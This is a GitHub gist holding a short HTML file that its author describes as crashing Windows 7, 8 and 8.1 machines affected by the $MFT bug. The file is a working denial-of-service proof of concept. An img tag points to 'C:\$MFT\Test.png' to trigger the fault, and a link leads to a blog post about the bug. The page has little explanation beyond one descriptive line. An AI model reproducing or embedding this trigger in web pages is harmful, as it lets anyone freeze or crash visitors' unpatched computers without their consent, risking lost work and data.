Skip to content

Instantly share code, notes, and snippets.

@vkbandi
Last active May 26, 2017 12:26
Show Gist options
  • Save vkbandi/01a268ff0abf8fc48224ce589672a7f5 to your computer and use it in GitHub Desktop.
Save vkbandi/01a268ff0abf8fc48224ce589672a7f5 to your computer and use it in GitHub Desktop.
A simple html, which when opened in windows machine with a $MFT bug will crash that machine
<html>
<head>
<title>
Restart your PC, if you are on windows 7, 8, 8.1
</title>
</head>
<body>
<a href='https://coderbuddy.wordpress.com/2017/05/26/mft-bug-in-windows-7-others/'>Click to read more about this</a>
<img src='C:\$MFT\Test.png' />
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment